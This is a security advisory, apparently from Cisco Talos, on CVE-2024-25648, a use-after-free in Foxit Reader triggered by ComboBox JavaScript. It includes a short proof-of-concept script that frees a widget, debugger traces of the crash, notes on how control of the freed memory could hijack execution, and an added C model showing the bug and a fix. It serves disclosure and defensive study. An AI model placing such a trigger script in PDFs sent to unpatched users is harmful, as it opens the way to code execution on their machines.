CVE-2024-25648
A use-after-free vulnerability exists in the way Foxit Reader 2024.1.0.23997 handles a ComboBox widget. Specially crafted JavaScript code inside a malicious PDF document can trigger reuse of a previously freed object, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site while the browser plugin extension is enabled.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Foxit Reader 2024.1.0.23997
Foxit Reader - https://www.foxitsoftware.com/pdf-reader/
8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-416 - Use After Free
Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.
JavaScript support in PDF renderers and editors enables dynamic documents that can change based on user input or events. There exists a use-after-free vulnerability in the way Foxit Reader handles a ComboBox object. This can be illustrated by the following proof-of-concept code:
function main() {
  // Create a ComboBox field named 'aaaa' on page 2 and attach a Format action to it.
  // (The advisory does not show how main() itself is invoked; a document open action is typical.)
  app.activeDocs[0].addField('aaaa', "combobox", 2, [13,8,0,19]);
  getField('aaaa').setAction("Format", 'delete_pages();');
  // Adding a field with the same name on page 0 fires the Format action,
  // which runs delete_pages() while the caller is still using the widget.
  app.activeDocs[0].addField('aaaa', "combobox", 0, [13,8,0,19]);
}
function delete_pages() {
  // deletePages() removes a page and frees the objects associated with it,
  // including the ComboBox widget whose Format action is currently executing.
  app.activeDocs[0].deletePages();
  app.activeDocs[0].deletePages();
}
The above code creates a ComboBox widget and assigns a callback function to its Format event, which is promptly triggered by the second call to addField. In the action callback, all that happens is a call to deletePages, which in turn ends up freeing all the objects associated with a page. The use-after-free occurs because the ComboBox object freed by deletePages() is subsequently used by the caller without any validation. We can observe the following in the debugger (with PageHeap enabled):
0:000> g
eax=00420000 ebx=072fe18c ecx=00420000 edx=155d432c esi=00000004 edi=155f31a0
eip=01750027 esp=072fddac ebp=072fde00 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506d77:
01750027 8b75d8 mov esi,dword ptr [ebp-28h] ss:002b:072fddd8=12d3c4a0
0:000> g
eax=072fd530 ebx=072fd59c ecx=02904f80 edx=00000002 esi=12ceebd0 edi=12cd8198
eip=02cd56e9 esp=072fd508 ebp=072fd548 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!FXJSE_GetClass+0x269:
02cd56e9 ffd1 call ecx {FoxitPDFReader!safe_vsnprintf+0x116a150 (02904f80)} ;<---------------- (1)
0:000> g
ModLoad: 71380000 716d7000 C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\plugins\PDFAccessibility.fpi
js call
eax=072fd530 ebx=072fd59c ecx=02904f80 edx=00000002 esi=158d1e10 edi=16417ce0
eip=02cd56e9 esp=072fd508 ebp=072fd548 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!FXJSE_GetClass+0x269:
02cd56e9 ffd1 call ecx {FoxitPDFReader!safe_vsnprintf+0x116a150 (02904f80)} ;<---------------- (2)
0:000> g
eax=072fae40 ebx=0c3a0174 ecx=12d3c4a0 edx=07111000 esi=0c3a0170 edi=13151348
eip=005aad36 esp=072fae64 ebp=072fd28c iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeb886:
005aad36 8b01 mov eax,dword ptr [ecx] ds:002b:12d3c4a0=0472e794
0:000> dd 12d3c4a0 ;<---------------- (3)
12d3c4a0 0472e794 133185e0 155ec3e0 12d41cc0
12d3c4b0 e0e0e000 00000001 10b9c9e8 01000101
12d3c4c0 00000004 00000000 162d49b0 00000000
12d3c4d0 10b9c944 135b09e0 157ec0d8 00000000
12d3c4e0 00000000 00000000 00000000 00000000
12d3c4f0 00000000 e0e0e000 00000000 00000000
12d3c500 00000000 a0a0a0a0 a0a0a0a0 001b0130
12d3c510 00000000 00000000 96981050 161b0152
0:000> p
eax=0472e794 ebx=0c3a0174 ecx=12d3c4a0 edx=07111000 esi=0c3a0170 edi=13151348
eip=005aad38 esp=072fae64 ebp=072fd28c iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeb888:
005aad38 6a01 push 1
0:000> p
eax=0472e794 ebx=0c3a0174 ecx=12d3c4a0 edx=07111000 esi=0c3a0170 edi=13151348
eip=005aad3a esp=072fae60 ebp=072fd28c iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeb88a:
005aad3a ff5004 call dword ptr [eax+4] ds:002b:0472e798=0174e360 ;<---------------- (4)
0:000> p
eax=12d3c4a0 ebx=0c3a0174 ecx=12d3c4a0 edx=00000001 esi=0c3a0170 edi=13151348
eip=005aad3d esp=072fae64 ebp=072fd28c iopl=0 nv up ei pl nz ac po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200212
FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0xeb88d:
005aad3d 83c604 add esi,4
0:000> dd 12d3c4a0 ;<---------------- (5)
12d3c4a0 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
12d3c4b0 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
12d3c4c0 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
12d3c4d0 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
12d3c4e0 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
12d3c4f0 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
12d3c500 f0f0f0f0 a0a0a0a0 a0a0a0a0 001b0130
12d3c510 00000000 00000000 96981050 161b0152
At [1] and [2] above, the javascript::CFXJS_Document::deletePages_static method associated with the JavaScript API deletePages() is called. The second call to deletePages_static() calls the destructor of the CBF_Widget class at [4]. This destructor call frees the vulnerable CBF_Widget object. The contents of the vulnerable CBF_Widget object are dumped at [3] and [5], before and after the destructor is called; the f0f0f0f0 fill at [5] is the pattern PageHeap writes over freed memory, so the object at 12d3c4a0 is now a freed allocation. The vulnerable CBF_Widget object is a type of ComboBox object, which is later used without any validation. This can be observed in a debugger at the time of the crash:
0:000> p
eax=00000000 ebx=072fe18c ecx=07111000 edx=07111000 esi=12d3c4a0 edi=155f31a0
eip=0175009b esp=072fddac ebp=072fde00 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506deb:
0175009b 8d4dec lea ecx,[ebp-14h]
0:000> p
eax=00000000 ebx=072fe18c ecx=072fddec edx=07111000 esi=12d3c4a0 edi=155f31a0
eip=0175009e esp=072fddac ebp=072fde00 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506dee:
0175009e e81d536000 call FoxitPDFReader!safe_vsnprintf+0x5ba590 (01d553c0)
0:000> p
eax=00000000 ebx=072fe18c ecx=07111000 edx=07111000 esi=12d3c4a0 edi=155f31a0
eip=017500a3 esp=072fddac ebp=072fde00 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506df3:
017500a3 c745fcffffffff mov dword ptr [ebp-4],0FFFFFFFFh ss:002b:072fddfc=00000000
0:000> p
eax=00000000 ebx=072fe18c ecx=07111000 edx=07111000 esi=12d3c4a0 edi=155f31a0
eip=017500aa esp=072fddac ebp=072fde00 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506dfa:
017500aa 8d4d24 lea ecx,[ebp+24h]
0:000> p
eax=00000000 ebx=072fe18c ecx=072fde24 edx=07111000 esi=12d3c4a0 edi=155f31a0
eip=017500ad esp=072fddac ebp=072fde00 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506dfd:
017500ad e80e536000 call FoxitPDFReader!safe_vsnprintf+0x5ba590 (01d553c0)
0:000> p
eax=155dd518 ebx=072fe18c ecx=072fde24 edx=07111000 esi=12d3c4a0 edi=155f31a0
eip=017500b2 esp=072fddac ebp=072fde00 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506e02:
017500b2 8bc6 mov eax,esi
0:000> p
eax=12d3c4a0 ebx=072fe18c ecx=072fde24 edx=07111000 esi=12d3c4a0 edi=155f31a0
eip=017500b4 esp=072fddac ebp=072fde00 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506e04:
017500b4 8b4df4 mov ecx,dword ptr [ebp-0Ch] ss:002b:072fddf4=072fde40
0:000> p
eax=12d3c4a0 ebx=072fe18c ecx=072fde40 edx=07111000 esi=12d3c4a0 edi=155f31a0
eip=017500b7 esp=072fddac ebp=072fde00 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506e07:
017500b7 64890d00000000 mov dword ptr fs:[0],ecx fs:0053:00000000=072fddf4
0:000> p
eax=12d3c4a0 ebx=072fe18c ecx=072fde40 edx=07111000 esi=12d3c4a0 edi=155f31a0
eip=017500be esp=072fddac ebp=072fde00 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506e0e:
017500be 59 pop ecx
0:000> p
eax=12d3c4a0 ebx=072fe18c ecx=3d29bcd1 edx=07111000 esi=12d3c4a0 edi=155f31a0
eip=017500bf esp=072fddb0 ebp=072fde00 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506e0f:
017500bf 5f pop edi
0:000> p
eax=12d3c4a0 ebx=072fe18c ecx=3d29bcd1 edx=07111000 esi=12d3c4a0 edi=10bd0640
eip=017500c0 esp=072fddb4 ebp=072fde00 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506e10:
017500c0 5e pop esi
0:000> p
eax=12d3c4a0 ebx=072fe18c ecx=3d29bcd1 edx=07111000 esi=10c6a018 edi=10bd0640
eip=017500c1 esp=072fddb8 ebp=072fde00 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506e11:
017500c1 8be5 mov esp,ebp
0:000> p
eax=12d3c4a0 ebx=072fe18c ecx=3d29bcd1 edx=07111000 esi=10c6a018 edi=10bd0640
eip=017500c3 esp=072fde00 ebp=072fde00 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506e13:
017500c3 5d pop ebp
0:000> p
eax=12d3c4a0 ebx=072fe18c ecx=3d29bcd1 edx=07111000 esi=10c6a018 edi=10bd0640
eip=017500c4 esp=072fde04 ebp=072fde4c iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x506e14:
017500c4 c3 ret
0:000> p
eax=12d3c4a0 ebx=072fe18c ecx=3d29bcd1 edx=07111000 esi=10c6a018 edi=10bd0640
eip=00d7e5ce esp=072fde08 ebp=072fde4c iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!CryptUIWizExport+0x3574e:
00d7e5ce 83c420 add esp,20h
0:000> p
eax=12d3c4a0 ebx=072fe18c ecx=3d29bcd1 edx=07111000 esi=10c6a018 edi=10bd0640
eip=00d7e5d1 esp=072fde28 ebp=072fde4c iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!CryptUIWizExport+0x35751:
00d7e5d1 eb56 jmp FoxitPDFReader!CryptUIWizExport+0x357a9 (00d7e629)
0:000> p
eax=12d3c4a0 ebx=072fe18c ecx=3d29bcd1 edx=07111000 esi=10c6a018 edi=10bd0640
eip=00d7e629 esp=072fde28 ebp=072fde4c iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!CryptUIWizExport+0x357a9:
00d7e629 8bc8 mov ecx,eax
0:000> p
eax=12d3c4a0 ebx=072fe18c ecx=12d3c4a0 edx=07111000 esi=10c6a018 edi=10bd0640
eip=00d7e62b esp=072fde28 ebp=072fde4c iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!CryptUIWizExport+0x357ab:
00d7e62b 85c9 test ecx,ecx
0:000> p
eax=12d3c4a0 ebx=072fe18c ecx=12d3c4a0 edx=07111000 esi=10c6a018 edi=10bd0640
eip=00d7e62d esp=072fde28 ebp=072fde4c iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!CryptUIWizExport+0x357ad:
00d7e62d 742d je FoxitPDFReader!CryptUIWizExport+0x357dc (00d7e65c) [br=0]
0:000> p
eax=12d3c4a0 ebx=072fe18c ecx=12d3c4a0 edx=07111000 esi=10c6a018 edi=10bd0640
eip=00d7e62f esp=072fde28 ebp=072fde4c iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!CryptUIWizExport+0x357af:
00d7e62f 8b01 mov eax,dword ptr [ecx] ds:002b:12d3c4a0=f0f0f0f0 ; <---------------- [6]
0:000> p
eax=f0f0f0f0 ebx=072fe18c ecx=12d3c4a0 edx=07111000 esi=10c6a018 edi=10bd0640
eip=00d7e631 esp=072fde28 ebp=072fde4c iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!CryptUIWizExport+0x357b1:
00d7e631 8b4044 mov eax,dword ptr [eax+44h] ds:002b:f0f0f134=???????? ; <---------------- [7]
0:000> u
FoxitPDFReader!CryptUIWizExport+0x357b1:
00d7e631 8b4044 mov eax,dword ptr [eax+44h]
00d7e634 ffd0 call eax
00d7e636 8bf0 mov esi,eax
00d7e638 c745fcffffffff mov dword ptr [ebp-4],0FFFFFFFFh
00d7e63f 8d4d24 lea ecx,[ebp+24h]
00d7e642 e8796dfd00 call FoxitPDFReader!safe_vsnprintf+0x5ba590 (01d553c0)
00d7e647 8bc6 mov eax,esi
00d7e649 8b4df4 mov ecx,dword ptr [ebp-0Ch]
0:000> kb
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 072fde4c 029aeb05 072fde24 00000000 41500000 FoxitPDFReader!CryptUIWizExport+0x357b1
01 072fdf38 0294f51a 10b70bb0 00000000 00000004 FoxitPDFReader!safe_vsnprintf+0x1213cd5
02 072fe050 02903529 15de8118 072fe118 072fe098 FoxitPDFReader!safe_vsnprintf+0x11b46ea
03 072fe0f0 02cd56eb 15de8118 072fe120 072fe118 FoxitPDFReader!safe_vsnprintf+0x11686f9
04 072fe138 02eb9a6b 12f50ba8 27629525 12f50ba8 FoxitPDFReader!FXJSE_GetClass+0x26b
05 072fe1a0 02eb922e 072fe1e8 27629525 072fe2c4 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e3cab
06 072fe234 02eb94e5 072fe264 12f50ba8 072fe2c4 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e346e
07 072fe27c 02eb936b 072fe294 00000009 072fe2e0 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e3725
08 072fe298 030db17b 00000009 072fe2e0 12f50ba8 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e35ab
09 072fe2b8 030771d9 37342339 2ed520e5 00000012 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x4053bb
0a 072fe310 030771d9 2763eb6d 2ed51ddd 2ed51e31 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1419
0b 072fe33c 03075860 2763eb6d 373421b1 2ed51ddd FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1419
0c 072fe354 03075689 00000000 00000000 00000002 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39faa0
0d 072fe380 02d11f4e 12f50ba8 37342339 2ed51ddd FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39f8c9
0e 072fe490 02d11a42 072fe624 12f50ba8 072fe4ec FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3c18e
0f 072fe518 02cfa744 072fe624 12f50ba8 1daaf41c FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3bc82
10 072fe6c8 02cfa240 072fe764 1daaf444 00000000 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24984
11 072fe6dc 02cd3c5f 072fe764 1daaf444 3d298585 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24480
12 072fe754 02cd4596 1daaf41c 15c858b8 1daaf408 FoxitPDFReader!FXJSE_Runtime_Release+0xeaf
13 072fe790 02878af7 10b7d580 154f147c 15c858b8 FoxitPDFReader!FXJSE_ExecuteScript+0x86
14 072fe848 0287a129 00000000 072fe8d8 072fe880 FoxitPDFReader!safe_vsnprintf+0x10ddcc7
15 072fe860 00bb20df 072fe8d8 072fe880 3d298a41 FoxitPDFReader!safe_vsnprintf+0x10df2f9
16 072fe890 00bb0fa4 13075cf8 00000015 072fe8b8 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c69cf
17 072fe8d0 00baf9d0 186c9020 10b707f0 12e38c38 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c5894
18 072fe924 0049d322 072fe954 10b707f0 12e38c38 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c42c0
19 072fe974 0071901b 00000000 3d299749 7fffffff FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x8852
1a 072ff598 03cb9713 00000000 00000000 3d2994b9 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x6194b
1b 072ff668 03cba8ec 00000429 00000000 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x199cc3
1c 072ff68c 03cb5292 00000429 00000000 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x19ae9c
1d 072ff700 03cb5b05 15d80558 0004094e 00000429 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x195842
1e 072ff720 750c120b 0004094e 00000429 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x1960b5
1f 072ff74c 750b81ca 03cb5ad1 0004094e 00000429 USER32!_InternalCallWinProc+0x2b
20 072ff830 750b5f2a 03cb5ad1 00000000 00000429 USER32!UserCallWinProcCheckWow+0x33a
21 072ff8a4 750b5cf0 00000329 072ff8cc 0069f324 USER32!DispatchMessageWorker+0x22a
22 072ff8b0 0069f324 0c3c8fe8 0c3c8fe8 057d98e8 USER32!DispatchMessageW+0x10
23 072ff8cc 0069f3e3 057d98e8 0069f350 ffffffff FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x1dfe74
24 072ff8ec 040e29c2 00000000 0580550c 0710e000 FoxitPDFReader!AUILib::SkinManagerColor::operator!=+0x1dff33
25 072ff904 03e9cef1 00250000 00000000 0c3653c4 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x5c2f72
26 072ff950 76ddfcc9 0710e000 76ddfcb0 072ff9bc FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x37d4a1
27 072ff960 77247c6e 0710e000 8017ce93 00000000 KERNEL32!BaseThreadInitThunk+0x19
28 072ff9bc 77247c3e ffffffff 77268c33 00000000 ntdll!__RtlUserThreadStart+0x2f
29 072ff9cc 00000000 03e9cfc0 0710e000 00000000 ntdll!_RtlUserThreadStart+0x1b
At [6] above, ecx contains the same pointer (12d3c4a0) as the CBF_Widget object dumped at [3] and [5], which now belongs to a freed allocation. The value in ecx is dereferenced as if it were a live object pointer. This is the use-after-free and, with PageHeap's fill pattern in place of the vtable pointer, it results in a crash. The subsequent instructions at [7] constitute the usual virtual call: the vtable pointer is loaded from the freed object, a function pointer is read at offset 0x44 of that table and then called. An attacker who controls the contents of the freed allocation therefore directly controls the execution flow.
Since additional JavaScript code can be executed between the free and the reuse, the freed memory could be put under attacker control. With careful memory layout manipulation, this can lead to further memory corruption and ultimately arbitrary code execution.
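The pattern behind this bug, as an added example that is not part of the advisory and is not Foxit's code: an event dispatcher invokes the widget's Format action, the action runs deletePages() and destroys the widget, and the dispatcher then keeps using the raw pointer it still holds. The widget layout, the poison-on-free pool (which mimics PageHeap's f0 fill so the stale access is detectable rather than undefined behaviour) and the reference-holding fix are assumptions made for this model; the page does not describe how Foxit actually fixed the issue.

```c
#include <stdio.h>
#include <string.h>

/* Model of a widget whose event callback can destroy it (assumed layout,
   not Foxit's CBF_Widget). The fill byte mirrors the f0f0f0f0 pattern that
   PageHeap left in the freed object in the advisory's debugger dump. */
#define FREED_FILL 0xF0
#define LIVE_MAGIC 0x57494447u /* 'WIDG' marker, destroyed by the poison fill */

typedef struct Widget Widget;
typedef void (*FormatAction)(Widget *self);

struct Widget {
    unsigned magic;          /* stands in for the vtable pointer read at [6] */
    int refcount;            /* owners: the document, plus any temporary holder */
    FormatAction on_format;  /* "Format" action installed by setAction() */
    char name[16];
};

/* The document owns one widget slot; deletePages() drops that ownership. */
typedef struct {
    Widget *widget;
    int formatted;           /* Format events that completed on a live widget */
} Document;

static Widget pool[8];       /* fixed pool so "freed" memory stays addressable */
static int pool_used;
static Document g_doc;

static Widget *widget_create(const char *name, FormatAction action) {
    Widget *w = &pool[pool_used++];
    w->magic = LIVE_MAGIC;
    w->refcount = 1;         /* the document's reference */
    w->on_format = action;
    snprintf(w->name, sizeof w->name, "%s", name);
    return w;
}

/* Release one reference; the last release "frees" the object by poisoning it,
   so a later use is detectable instead of being undefined behaviour. */
static void widget_release(Widget *w) {
    if (--w->refcount == 0)
        memset(w, FREED_FILL, sizeof *w);
}

/* Model of app.activeDocs[0].deletePages(): the page's widgets are destroyed. */
static void doc_delete_pages(Document *d) {
    Widget *w = d->widget;
    if (w) {
        d->widget = NULL;
        widget_release(w);
    }
}

/* The PoC's Format action: delete_pages() calls deletePages() twice. */
static void action_delete_pages(Widget *self) {
    (void)self;
    doc_delete_pages(&g_doc);
    doc_delete_pages(&g_doc);   /* second call finds no widget and does nothing */
}

/* A benign Format action that leaves the document alone. */
static void action_noop(Widget *self) { (void)self; }

/* Vulnerable dispatcher: keeps a raw pointer across the callback and then
   touches the object. Returns 0 on success, 1 if it touched freed memory
   (the real reader crashes on the vtable load at [6]/[7] instead). */
static int dispatch_format_vulnerable(Document *d) {
    Widget *w = d->widget;
    if (!w) return -1;
    w->on_format(w);                      /* may run deletePages() and free w */
    if (w->magic != LIVE_MAGIC) return 1; /* poisoned: use-after-free */
    d->formatted++;
    return 0;
}

/* Hardened dispatcher: holds its own reference for the duration of the
   callback and re-checks that the document still owns the widget afterwards.
   Returns 0 on success, 2 if the callback detached the widget. */
static int dispatch_format_hardened(Document *d) {
    Widget *w = d->widget;
    if (!w) return -1;
    w->refcount++;                        /* keep w alive across the callback */
    w->on_format(w);
    int attached = (d->widget == w);      /* did the callback delete the page? */
    if (attached) d->formatted++;         /* safe: w is still live either way */
    widget_release(w);                    /* drop our hold; frees if detached */
    return attached ? 0 : 2;
}

/* Build the PoC scenario from scratch and run one dispatcher over it. */
static int run_scenario(int hardened, int deleting_action) {
    memset(pool, 0, sizeof pool);
    pool_used = 0;
    memset(&g_doc, 0, sizeof g_doc);
    g_doc.widget = widget_create("aaaa", deleting_action ? action_delete_pages : action_noop);
    return hardened ? dispatch_format_hardened(&g_doc)
                    : dispatch_format_vulnerable(&g_doc);
}

int main(void) {
    printf("vulnerable, deleting action: %d (1 = touched freed memory)\n", run_scenario(0, 1));
    printf("hardened,   deleting action: %d (2 = detach detected, no UAF)\n", run_scenario(1, 1));
    printf("vulnerable, benign action:   %d\n", run_scenario(0, 0));
    printf("hardened,   benign action:   %d\n", run_scenario(1, 0));
    return 0;
}
```

Build with `cc -std=c99 -Wall uaf_model.c`. The vulnerable dispatcher only notices the freed object because the model poisons freed memory the way PageHeap does; on a production heap the block would be handed to the next allocation of a similar size, which is exactly the window the paragraph above describes, where JavaScript run between the free and the reuse can fill it with attacker-chosen data before the virtual call at [7].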
The vendor has provided updated versions.
2024-04-01 - Vendor Disclosure
2024-04-28 - Vendor Patch Release
2024-04-30 - Public Release
Discovered by KPC of Cisco Talos.